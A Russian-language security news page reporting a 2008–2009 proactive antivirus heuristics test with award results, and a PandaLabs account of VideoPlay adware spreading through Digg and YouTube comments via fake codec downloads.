Тест антивирусов проводился под операционной системой Windows XP SP3 в период с 3 декабря 2008 года по 18 января 2009 года в соответствии с определенной методологией, по которой создавались специальные условия для проверки эффективности работы эвристиков (для этого у всех антивирусов отключалась функция обновления, т.е. происходило замораживание антивирусных баз данных на дату начала теста).

Для проведения теста во время заморозки антивирусных баз была собрана коллекция из 5166 уникальных самплов новейших вредоносных программ и коллекция из 15121 чистого файла.

Абсолютным лидером по эффективности эвристического компонента защиты по итогам теста Avira AntiVir Premium, чей уровень детектирования неизвестных вредоносных программ оказался очень высоким – 71%. Однако повышенный уровень ложных срабатываний позволил этому продукты получить только лишь награду Silver Proactive Protection Award.

Такая же участь постигла антивирус DrWeb, чья новая версия 5.0 показала очень высокий результат детектирования в 61% ровно, но повышенный уровень ложных срабатываний позволил ему получить только награду Silver Proactive Protection Award.

Главным разочарованием теста, по словам исследователей, стал Sophos Anti-Virus, показавший уровень проактивного детектирования более 61% ценой огромного количества ложных срабатываний 2,24%.

Лучшие результаты по балансу проактивного детектирования и ложных срабатываний показала тройка Kaspersky Anti-Virus, Eset Nod32 Anti-Virus и BitDefender Antivirus. Их результаты оказались практически идентичны - уровень эвристического детектирования 60% и уровень ложных срабатываний 0,01-0,04%. Согласно используемой схеме награждения эти антивирусы получили награду Gold Proactive Protection Award.

Высокую эффективность эвристического компонента защиты показала большая группа антивирусов, получившая награду Silver Proactive Protection Award. В нее, помимо уже перечисленных выше продуктов, вошли AVG Anti-Virus, Avast! Professional Edition, Norton Anti-Virus, VBA32 Antivirus и F-Secure Anti-Virus. В Anti-Malware также отмечают, что Norton Anti-Virus оказался единственным из тестируемых антивирусов показавшим нулевой уровень ложных срабатываний.Еще 3 продукта: Panda Antivirus, Trend Micro Internet Security и Agnitum Outpost Anti-Virus Pro показали удовлетворительный результат и получили награду Bronze Proactive Protection Award.

источник

Рекламная программа VideoPlay заражает пользователей Digg.com и YouTube


http://www.securitylab.ru/upload/iblock/1da/1dafd2a202ae75d6882cde9b119e1ec5.jpg

PandaLabs с начала 2009 года зафиксировала стремительный рост количества компьютеров, зараженных рекламной программой VideoPlay: рост составил свыше 400%. Основными каналами распространения стали популярные сайты Web 2.0, такие как Digg.com или YouTube.

На страницах обоих ресурсов это рекламное ПО распространялось через комментарии к новостям (в случае с Digg.com) или через видео (как на YouTube).

В комментариях пользователям предлагалось посмотреть порнографическое видео. Для этого нужно было перейти по ссылке из комментария. Пользователи, зашедшие по ссылке, перенаправлялись на другую страницу, где им предлагалось загрузить кодек для просмотра видео. При этом при попытке загрузить требуемые кодеки на компьютер пользователя проникала рекламная программа.

По словам Луиса Корронса, технического директора PandaLabs, это еще один пример того, как кибер-преступники используют наиболее популярные веб-страницы и социальную инженерию для массового распространения вредоносного ПО. "Пользователи должны помнить, что, даже посещая проверенные сайты, они должны быть всегда «на чеку». Особенно это касается тех случаев, когда пользователи собираются прочитать «горячий материал», реагируя на его сенсационный заголовок, так как подобная ситуация представляет собой типичный способ обмана пользователей и заражения компьютеров”, - предупреждает Корронс.

Программа VideoPlay после своей установки загружает червя, который крадет данные почты и пароли для доступа к различным веб-сервисам.

Полученная информация может в дальнейшем использоваться для кражи новых паролей для таких сервисов как Digg.com и YouTube, чтобы от лица пострадавшего пользователя публиковать на данных сайтах комментарии, содержащие ссылки на вредоносные программы, что позволяет киберпреступникам все активнее распространять созданные инфекции при помощи рекламного ПО.

источник

Sociable